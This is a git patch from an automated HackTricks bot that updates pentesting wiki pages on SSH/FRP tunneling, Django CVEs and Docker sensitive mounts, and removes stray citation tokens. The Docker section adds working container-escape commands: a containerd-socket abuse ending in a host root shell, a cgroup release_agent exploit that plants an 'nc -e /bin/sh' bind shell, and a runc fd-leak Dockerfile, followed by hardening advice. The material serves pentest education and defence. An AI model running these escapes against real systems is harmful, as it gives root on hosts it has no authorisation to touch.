From 0ff15405c476d0c3af0088c69777770c8a3a511a Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 10 Jul 2025 16:28:42 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/linux-hardening/privilege-esca... --- .../tunneling-and-port-forwarding.md | 7 +-- .../sensitive-mounts.md | 62 ++++++++++++++++++- .../pentesting-web/django.md | 8 +-- 3 files changed, 68 insertions(+), 9 deletions(-) diff --git a/src/generic-hacking/tunneling-and-port-forwarding.md b/src/generic-hacking/tunneling-and-port-forwarding.md index 69a046306..279c0e9f3 100644 --- a/src/generic-hacking/tunneling-and-port-forwarding.md +++ b/src/generic-hacking/tunneling-and-port-forwarding.md @@ -107,7 +107,7 @@ route add -net 10.0.0.0/16 gw 1.1.1.1 > [!NOTE] > **Security – Terrapin Attack (CVE-2023-48795)** -> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. citeturn4search0 +> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. ## SSHUTTLE @@ -686,7 +686,7 @@ Start the connector: cloudflared tunnel run mytunnel ``` -Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. citeturn1search0 +Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. ## FRP (Fast Reverse Proxy) @@ -724,7 +724,7 @@ sshTunnelGateway.bindPort = 2200 # add to frps.toml ssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000 ``` -The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. citeturn2search1 +The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. ## Other tools to check @@ -734,4 +734,3 @@ The above command publishes the victim’s port **8080** as **attacker_ip:9000** {{#include ../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index a6d1f5b9e..0fa835043 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md @@ -291,8 +291,69 @@ locate the other containers' filesystems and SA / web identity tokens +### Other Sensitive Host Sockets and Directories (2023-2025) + +Mounting certain host Unix sockets or writable pseudo-filesystems is equivalent to giving the container full root on the node. **Treat the following paths as highly sensitive and never expose them to untrusted workloads**: + +```text +/run/containerd/containerd.sock # containerd CRI socket +/var/run/crio/crio.sock # CRI-O runtime socket +/run/podman/podman.sock # Podman API (rootful or rootless) +/var/run/kubelet.sock # Kubelet API on Kubernetes nodes +/run/firecracker-containerd.sock # Kata / Firecracker +``` + +Attack example abusing a mounted **containerd** socket: + +```bash +# inside the container (socket is mounted at /host/run/containerd.sock) +ctr --address /host/run/containerd.sock images pull docker.io/library/busybox:latest +ctr --address /host/run/containerd.sock run --tty --privileged --mount \ + type=bind,src=/,dst=/host,options=rbind:rw docker.io/library/busybox:latest host /bin/sh +chroot /host /bin/bash # full root shell on the host +``` + +A similar technique works with **crictl**, **podman** or the **kubelet** API once their respective sockets are exposed. + +Writable **cgroup v1** mounts are also dangerous. If `/sys/fs/cgroup` is bind-mounted **rw** and the host kernel is vulnerable to **CVE-2022-0492**, an attacker can set a malicious `release_agent` and execute arbitrary code in the *initial* namespace: + +```bash +# assuming the container has CAP_SYS_ADMIN and a vulnerable kernel +mkdir -p /tmp/x && echo 1 > /tmp/x/notify_on_release + +echo '/tmp/pwn' > /sys/fs/cgroup/release_agent # requires CVE-2022-0492 + +echo -e '#!/bin/sh\nnc -lp 4444 -e /bin/sh' > /tmp/pwn && chmod +x /tmp/pwn +sh -c "echo 0 > /tmp/x/cgroup.procs" # triggers the empty-cgroup event +``` + +When the last process leaves the cgroup, `/tmp/pwn` runs **as root on the host**. Patched kernels (>5.8 with commit `32a0db39f30d`) validate the writer’s capabilities and block this abuse. + +### Mount-Related Escape CVEs (2023-2025) + +* **CVE-2024-21626 – runc “Leaky Vessels” file-descriptor leak** + runc ≤1.1.11 leaked an open directory file descriptor that could point to the host root. A malicious image or `docker exec` could start a container whose *working directory* is already on the host filesystem, enabling arbitrary file read/write and privilege escalation. Fixed in runc 1.1.12 (Docker ≥25.0.3, containerd ≥1.7.14). + + ```Dockerfile + FROM scratch + WORKDIR /proc/self/fd/4 # 4 == "/" on the host leaked by the runtime + CMD ["/bin/sh"] + ``` + +* **CVE-2024-23651 / 23653 – BuildKit OverlayFS copy-up TOCTOU** + A race condition in the BuildKit snapshotter let an attacker replace a file that was about to be *copy-up* into the container’s rootfs with a symlink to an arbitrary path on the host, gaining write access outside the build context. Fixed in BuildKit v0.12.5 / Buildx 0.12.0. Exploitation requires an untrusted `docker build` on a vulnerable daemon. + +### Hardening Reminders (2025) + +1. Bind-mount host paths **read-only** whenever possible and add `nosuid,nodev,noexec` mount options. +2. Prefer dedicated side-car proxies or rootless clients instead of exposing the runtime socket directly. +3. Keep the container runtime up-to-date (runc ≥1.1.12, BuildKit ≥0.12.5, containerd ≥1.7.14). +4. In Kubernetes, use `securityContext.readOnlyRootFilesystem: true`, the *restricted* PodSecurity profile and avoid `hostPath` volumes pointing to the paths listed above. + ### References +- [runc CVE-2024-21626 advisory](https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv) +- [Unit 42 analysis of CVE-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/) - [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts) - [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf) - [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf) @@ -300,4 +361,3 @@ locate the other containers' filesystems and SA / web identity tokens {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/django.md b/src/network-services-pentesting/pentesting-web/django.md index a279c59f8..9b2412f54 100644 --- a/src/network-services-pentesting/pentesting-web/django.md +++ b/src/network-services-pentesting/pentesting-web/django.md @@ -65,15 +65,15 @@ Send the resulting cookie, and the payload runs with the permissions of the WSGI --- ## Recent (2023-2025) High-Impact Django CVEs Pentesters Should Check -* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. citeturn0search0 -* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. citeturn1search2 +* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. +* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. Always fingerprint the exact framework version via the `X-Frame-Options` error page or `/static/admin/css/base.css` hash and test the above where applicable. --- ## References -* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. citeturn0search0 -* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. citeturn1search2 +* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. +* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. {{#include /banners/hacktricks-training.md}}